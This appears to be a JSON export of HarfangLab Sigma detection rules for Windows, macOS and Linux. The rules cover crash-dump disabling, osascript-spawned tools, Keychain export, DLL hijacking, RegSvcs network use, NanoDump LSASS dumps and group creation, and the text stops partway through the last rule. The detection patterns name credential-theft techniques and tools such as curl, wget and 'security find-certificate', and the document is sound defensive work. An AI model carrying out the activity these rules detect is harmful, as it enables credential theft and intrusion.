"content": "title: Crash Dumps Mechanism Disabled\nid: 94256ed3-174c-46be-b5df-97c9d5d3af5a\ndescription: |\n Detects the Crash Dumps mechanism being disabled.\n Attackers can disable the crash dump mechanism to prevent Administrators from easily finding the reason of a system crash which could be linked to their malicious activities.\n It is recommended to ensure the legitimacy of this policy change.\nreferences:\n - https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/\n - https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/03/16\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\CrashDumpEnabled'\n Details: 'DWORD (0x00000000)'\n\n exclusion_from_graphical_interface:\n # via sysdm.cpl > Advanced > Settings > Write Debugging information\n Image: '?:\\Windows\\system32\\SystemPropertiesAdvanced.exe'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_opti:\n ProcessParentCommandLine|contains: '?:\\temp\\WS2016Optimisations.ps1'\n\n exclusion_citrix:\n ProcessOriginalFileName: 'CitrixOptimizerTool.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Citrix Systems, Inc.'\n\n exclusion_wmi:\n ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "94256ed3-174c-46be-b5df-97c9d5d3af5a",
"rule_name": "Crash Dumps Mechanism Disabled",
"rule_description": "Detects the Crash Dumps mechanism being disabled.\nAttackers can disable the crash dump mechanism to prevent Administrators from easily finding the reason of a system crash which could be linked to their malicious activities.\nIt is recommended to ensure the legitimacy of this policy change.\n",
"rule_creation_date": "2022-03-16",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "94503606-01d9-4e36-b05c-7ddbadadf645",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095181Z",
"creation_date": "2026-03-23T11:45:34.095183Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/",
"https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6",
"https://attack.mitre.org/techniques/T1059/002/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1059_002_osascript_spawn_process.yml",
"content": "title: Suspicious Program Spawned by Osascript\nid: 94503606-01d9-4e36-b05c-7ddbadadf645\ndescription: |\n Detects a suspicious program being spawned by osascript.\n An attacker could use Apple Script and execute other programs like python or ruby to achieve various behaviors like a reverse shell.\n It is recommended to investigate the program spawned by the script and the script itself to determine whether this action was legitimate.\nreferences:\n - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/\n - https://gist.github.com/Metnew/09a50c38d398c482b2df59082f0d13c6\n - https://attack.mitre.org/techniques/T1059/002/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.defense_evasion\n - attack.t1222.002\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - attack.command_and_control\n - attack.t1105\n - attack.discovery\n - attack.t1057\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Osascript\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_ancestors:\n Ancestors|contains: '/osascript'\n\n selection_descendants_lolbins:\n Image|endswith:\n - '/ditto'\n - '/zip'\n - '/curl'\n - '/wget'\n - '/cp'\n - '/mv'\n - '/cat'\n - '/dscl'\n - '/mdls'\n - '/security'\n - '/system_profiler'\n - '/sw_vers'\n - '/dscacheutil'\n - '/csrutil'\n - '/netstat'\n - '/who'\n - '/preintenv'\n - '/smbutil'\n - '/shownmount'\n - '/dseditgroup'\n - '/kcc'\n - '/mkpassdb'\n - '/dsenableroot'\n - '/grep'\n - '/ls'\n - '/ldapsearch'\n - '/nohup'\n - '/ps'\n - '/logname'\n\n selection_descendants_chmod:\n Image|endswith: '/chmod'\n CommandLine|contains: ' +x '\n\n exclusion_cellar:\n Image: '/bin/cat'\n Ancestors|contains:\n - '/opt/homebrew/Cellar/gopass-jsonapi/'\n - '/opt/homebrew/Cellar/gopass/'\n\n exclusion_globalprotect:\n - Ancestors|contains: '/Applications/GlobalProtect.app/Contents/Resources/PanGpHip'\n - CommandLine: '/usr/bin/grep -e state = -e path = -e SERVICE_NAME'\n\n exclusion_openoffice:\n CommandLine: 'grep ^ProductKey=LibreOffice * /Applications/LibreOffice.app/Contents/Resources/bootstraprc'\n ParentCommandLine: 'osascript /private/var/folders/*/LibreOffice Language Pack.app/Contents/Resources/osx_install.applescript'\n\n exclusion_pkinstallsandbox:\n GrandparentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox'\n - '/usr/bin/osascript /tmp/PKInstallSandbox'\n\n exclusion_postinstall:\n GrandparentCommandLine: 'bash -x postinstall'\n ParentCommandLine: 'bash -x postinstall'\n\n condition: selection_ancestors and 1 of selection_descendants_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "94503606-01d9-4e36-b05c-7ddbadadf645",
"rule_name": "Suspicious Program Spawned by Osascript",
"rule_description": "Detects a suspicious program being spawned by osascript.\nAn attacker could use Apple Script and execute other programs like python or ruby to achieve various behaviors like a reverse shell.\nIt is recommended to investigate the program spawned by the script and the script itself to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-04-15",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1057",
"attack.t1105",
"attack.t1119",
"attack.t1222.002",
"attack.t1560.001",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "94773690-ba2b-43cc-b7fc-ad9eb6bee0ba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294661Z",
"creation_date": "2026-03-23T11:45:35.294663Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294668Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md",
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_keychain_export_find_certificate.yml",
"content": "title: MacOS Keychain Exported via Find Certificate\nid: 94773690-ba2b-43cc-b7fc-ad9eb6bee0ba\ndescription: |\n Detects the macOS Keychain being exported via security using the find-certificate command.\n Keychain (or Keychain Services) is the macOS credential management system.\n Attackers may export macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\n It is recommended to analyze the context around the execution of the security binary to determine if this export is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2022/08/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security find-certificate -a -p\n Image: '/usr/bin/security'\n CommandLine|contains: 'find-certificate'\n ParentImage|contains: '?'\n\n # Git LFS seems to use keychain.\n exclusion_git_lfs:\n ParentImage|endswith: '/bin/git-lfs'\n CommandLine|contains|all:\n - 'find-certificate'\n - '/Library/Keychains/System.keychain'\n\n # Visual Studio Code is expected to use keychain.\n exclusion_vs_code:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper (Plugin)'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n - '*/Visual Studio Code.app/Contents/MacOS/Electron'\n - '*/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Users/*/.vscode/extensions/sonarsource.sonarlint-vscode-*-*/*/*/bin/java'\n - '/Users/*/.vscode-insiders/extensions/sonarsource.sonarlint-vscode-*-*/*/*-*/bin/java'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/MacOS/Electron'\n CommandLine|contains: 'security find-certificate -a -p'\n\n exclusion_glpi:\n ParentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_docker:\n - ParentImage: '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n GrandparentImage:\n - '/Applications/Docker.app/Contents/MacOS/Docker'\n - '/sbin/launchd'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n\n exclusion_node:\n ParentImage: '/Users/*/.nvm/versions/node/v*/bin/node'\n\n exclusion_fortinet:\n ParentImage:\n - '/Library/Application Support/Fortinet/FortiClient/bin/epctrl'\n - '/Library/Application Support/Fortinet/FortiClient/bin/ztagent'\n\n exclusion_postman:\n ParentImage: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_lens:\n ParentImage: '/Applications/Lens.app/Contents/MacOS/Lens'\n\n exclusion_ruby:\n ParentImage:\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/System/Library/Frameworks/Ruby.framework/Versions/*/usr/bin/ruby'\n\n exclusion_azure:\n ParentImage: '/Applications/Azure Data Studio.app/Contents/Frameworks/Azure Data Studio Helper (Plugin).app/Contents/MacOS/Azure Data Studio Helper (Plugin)'\n\n exclusion_openvpn:\n GrandparentImage: '/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect'\n\n exclusion_rider:\n ParentImage: '/users/*/applications/rider.app/contents/macos/rider'\n\n exclusion_intellij:\n ParentImage:\n - '/Applications/IntelliJ IDEA.app/Contents/MacOS/idea'\n - '/Users/*/Library/Application Support/JetBrains/IntelliJIdea*'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "94773690-ba2b-43cc-b7fc-ad9eb6bee0ba",
"rule_name": "MacOS Keychain Exported via Find Certificate",
"rule_description": "Detects the macOS Keychain being exported via security using the find-certificate command.\nKeychain (or Keychain Services) is the macOS credential management system.\nAttackers may export macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\nIt is recommended to analyze the context around the execution of the security binary to determine if this export is legitimate.\n",
"rule_creation_date": "2022-08-29",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9521e40e-07f4-4dfe-b9e7-6e1b287ab459",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089650Z",
"creation_date": "2026-03-23T11:45:34.089652Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089657Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_coccocupdate.yml",
"content": "title: DLL Hijacking via CocCocUpdate.exe\nid: 9521e40e-07f4-4dfe-b9e7-6e1b287ab459\ndescription: |\n Detects potential Windows DLL Hijacking via CocCocUpdate.exe related to Coc Coc Browser Update Software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CocCocUpdate.exe'\n ImageLoaded|endswith: '\\coccocpdate.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\CocCoc\\'\n - '?:\\Program Files (x86)\\CocCoc\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\CocCoc\\'\n - '?:\\Program Files (x86)\\CocCoc\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'COC COC COMPANY LIMITED'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9521e40e-07f4-4dfe-b9e7-6e1b287ab459",
"rule_name": "DLL Hijacking via CocCocUpdate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CocCocUpdate.exe related to Coc Coc Browser Update Software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "95488005-c881-4387-9e17-b146f890aa19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085568Z",
"creation_date": "2026-03-23T11:45:34.085570Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085574Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudsek.com/blog/technical-analysis-of-the-redline-stealer",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_012_sus_regsvcs_net_comm.yml",
"content": "title: Suspicious RegSvcs.exe Network Communication\nid: 95488005-c881-4387-9e17-b146f890aa19\ndescription: |\n Detects a network communication to an external IP address from RegSvcs.exe.\n This can be the result of the loading of a malicious .NET COM object with RegSvcs.exe as a way to bypass defenses. It is commonly used by various malware such as Redline Stealer.\n It is recommended to investigate the parent processes of the detected process and the destination IP address to determine the legitimacy of this behavior.\n If there is no parent process, look for any other alerts indicating the establishment of persistence or reads on sensitive files.\nreferences:\n - https://www.cloudsek.com/blog/technical-analysis-of-the-redline-stealer\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/09/27\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - attack.command_and_control\n - attack.t1571\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.LOLBin.RegSvcs\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\RegSvcs.exe'\n - ProcessOriginalFileName: 'RegSvcs.exe'\n\n filter_remote_ip_cidr:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - 'fe80::/10'\n - '100.64.0.0/10' # RFC6598\n\n filter_remote_ip_pattern:\n DestinationIp:\n - '' # Empty\n - '::1'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "95488005-c881-4387-9e17-b146f890aa19",
"rule_name": "Suspicious RegSvcs.exe Network Communication",
"rule_description": "Detects a network communication to an external IP address from RegSvcs.exe.\nThis can be the result of the loading of a malicious .NET COM object with RegSvcs.exe as a way to bypass defenses. It is commonly used by various malware such as Redline Stealer.\nIt is recommended to investigate the parent processes of the detected process and the destination IP address to determine the legitimacy of this behavior.\nIf there is no parent process, look for any other alerts indicating the establishment of persistence or reads on sensitive files.\n",
"rule_creation_date": "2024-09-27",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9551f323-b5d9-4aaf-a46f-43581397ac81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095329Z",
"creation_date": "2026-03-23T11:45:34.095331Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095335Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/helpsystems/nanodump/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_file_nanodump.yml",
"content": "title: LSASS Memory Dumped via NanoDump\nid: 9551f323-b5d9-4aaf-a46f-43581397ac81\ndescription: |\n Detects an attempt to dump the LSASS process memory using the NanoDump tool.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\n It is recommended to analyze the parent process for malicious content.\nreferences:\n - https://github.com/helpsystems/nanodump/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/11/30\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.Filesystem\n - classification.Windows.HackTool.NanoDump\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\\\*_??????????_lsass.dmp'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9551f323-b5d9-4aaf-a46f-43581397ac81",
"rule_name": "LSASS Memory Dumped via NanoDump",
"rule_description": "Detects an attempt to dump the LSASS process memory using the NanoDump tool.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nAfter a user logs on, the system generates and stores a variety of credential materials in LSASS process memory.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct lateral movement.\nIt is recommended to analyze the parent process for malicious content.\n",
"rule_creation_date": "2021-11-30",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "955e6d93-f3e3-4d66-8187-cb8496828588",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612432Z",
"creation_date": "2026-03-23T11:45:34.612436Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612443Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_groupadd_linux.yml",
"content": "title: Group Created via groupadd\nid: 955e6d93-f3e3-4d66-8187-cb8496828588\ndescription: |\n Detects a suspicious attempt to create a new group.\n Adversaries may create new groups to hide their activity or achieve persistence.\n It is recommended to check the created group for malicious intent and to analyze the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2023/01/03\nmodified: 2025/05/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.AccountManipulation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/groupadd'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|/usr/bin/apt|'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python? /usr/dnf'\n - '/usr/bin/python? /usr/bin/dnf'\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python?.? /bin/dnf'\n - 